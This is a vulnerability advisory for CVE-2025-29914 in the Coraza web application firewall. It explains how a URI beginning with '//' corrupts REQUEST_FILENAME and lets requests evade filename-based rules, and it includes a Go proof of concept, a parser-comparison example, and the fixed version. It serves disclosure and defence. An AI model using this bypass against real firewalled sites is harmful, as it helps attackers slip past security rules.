First published: Thu Mar 20 2025 (Updated: )
### Summary

URLs starting with `//` are not parsed properly, and the request `REQUEST_FILENAME` variable contains a wrong value, leading to a potential rules bypass.

### Details

If a request is made on a URI starting with `//`, coraza will set a wrong value in `REQUEST_FILENAME`. For example, if the URI `//bar/uploads/foo.php?a=b` is passed to coraza, `REQUEST_FILENAME` will be set to `/uploads/foo.php`.

The root cause is the usage of `url.Parse` to parse the URI in [ProcessURI](https://github.com/corazawaf/coraza/blob/8b612f4e6e18c606e371110227bc7669dc714cab/internal/corazawaf/transaction.go#L768). `url.Parse` can parse either absolute URLs (starting with a scheme) or relative ones (just the path). `//bar/uploads/foo.php` is a valid absolute URI with an empty scheme, so `url.Parse` will consider `bar` as the host and the path will be set to `/uploads/foo.php`.

### PoC

```go
package main

import (
	"fmt"
	"os"

	"github.com/corazawaf/coraza/v3"
)

// A single rule that should deny any request whose filename is a
// script-like file under /bar/uploads/.
const testRule = `
SecDebugLogLevel 9
SecDebugLog /dev/stdout
SecRule REQUEST_FILENAME "@rx /bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny"
`

func main() {
	// Default to the scheme-relative form; TEST_URL overrides it so the
	// same program can be run with "/bar/uploads/foo.php" for comparison.
	var testURL = "//bar/uploads/foo.php"
	if os.Getenv("TEST_URL") != "" {
		testURL = os.Getenv("TEST_URL")
	}
	fmt.Printf("Testing URL: %s\n", testURL)

	config := coraza.NewWAFConfig().WithDirectives(testRule)
	waf, err := coraza.NewWAF(config)
	if err != nil {
		panic(err)
	}

	tx := waf.NewTransaction()
	tx.ProcessURI(testURL, "GET", "HTTP/1.1")
	// Phase 1 runs here; an interruption means the rule matched.
	// With "//bar/uploads/foo.php" nothing is printed: REQUEST_FILENAME
	// is "/uploads/foo.php" and the rule does not fire.
	in := tx.ProcessRequestHeaders()
	if in != nil {
		fmt.Printf("%+v\n", in)
	}
}
```

### Impact

Potential bypass of rules using `REQUEST_FILENAME`.
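The following Go program is an added example, not part of the advisory or of Coraza's own code. It isolates the parsing step the Details section describes: `url.Parse` turns the `//bar` prefix into a host, while `url.ParseRequestURI`, the standard-library parser for HTTP request-targets, keeps the whole string as a path. The advisory's filename regexp is then applied to both results to show which one the rule would have matched. Only the Go standard library is used; the helper names (`viaParse`, `viaParseRequestURI`, `matchesUploadRule`) are the example's own, and the program makes no claim about how the 3.3.3 fix is implemented.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
)

// ParsedTarget holds the two fields that decide what a filename-based
// rule sees: the host a parser split off, and the remaining path.
type ParsedTarget struct {
	Host string
	Path string
}

// viaParse reproduces the pre-3.3.3 behaviour described in the advisory:
// url.Parse accepts scheme-relative references, so a leading "//" is read
// as an authority and the first path segment becomes the host.
func viaParse(target string) (ParsedTarget, error) {
	u, err := url.Parse(target)
	if err != nil {
		return ParsedTarget{}, err
	}
	return ParsedTarget{Host: u.Host, Path: u.Path}, nil
}

// viaParseRequestURI parses the string as an HTTP request-target. Without a
// scheme it never splits off an authority, so "//bar/..." stays a path.
func viaParseRequestURI(target string) (ParsedTarget, error) {
	u, err := url.ParseRequestURI(target)
	if err != nil {
		return ParsedTarget{}, err
	}
	return ParsedTarget{Host: u.Host, Path: u.Path}, nil
}

// uploadRule is the same expression the advisory's SecRule applies to
// REQUEST_FILENAME, compiled with Go's regexp package.
var uploadRule = regexp.MustCompile(`/bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)`)

// matchesUploadRule reports whether the rule would fire on the given path.
func matchesUploadRule(path string) bool {
	return uploadRule.MatchString(path)
}

func main() {
	// Constructed inputs: the plain request and its scheme-relative variant.
	targets := []string{
		"/bar/uploads/foo.php?a=b",
		"//bar/uploads/foo.php?a=b",
	}
	for _, t := range targets {
		p, err := viaParse(t)
		if err != nil {
			panic(err)
		}
		r, err := viaParseRequestURI(t)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-26s url.Parse: host=%q path=%q rule=%v\n",
			t, p.Host, p.Path, matchesUploadRule(p.Path))
		fmt.Printf("%-26s ParseRequestURI: host=%q path=%q rule=%v\n",
			"", r.Host, r.Path, matchesUploadRule(r.Path))
	}
}
```

Run it with `go run .` and the second target shows the gap: `url.Parse` yields host `bar` and path `/uploads/foo.php`, on which the rule does not fire, whereas `url.ParseRequestURI` yields an empty host and path `//bar/uploads/foo.php`, on which it does. A defender auditing a WAF integration can use the same two calls to check which parser sits in front of any filename-based rule.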
Credit: security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
go/github.com/corazawaf/coraza/v3 | <3.3.3 | 3.3.3 |
go/github.com/jptosso/coraza-waf | <3.3.3 | 3.3.3 |
Coraza | <3.3.3 | |
CVE-2025-29914 has a medium severity level due to incorrect handling of specific URI patterns.
To fix CVE-2025-29914, update OWASP Coraza WAF to version 3.3.3 or later.
CVE-2025-29914 can lead to incorrect values in the `REQUEST_FILENAME` variable, potentially affecting security and request handling.
CVE-2025-29914 affects all versions of OWASP Coraza WAF prior to version 3.3.3.
Currently, there are no recommended workarounds for CVE-2025-29914 other than upgrading to the fixed version.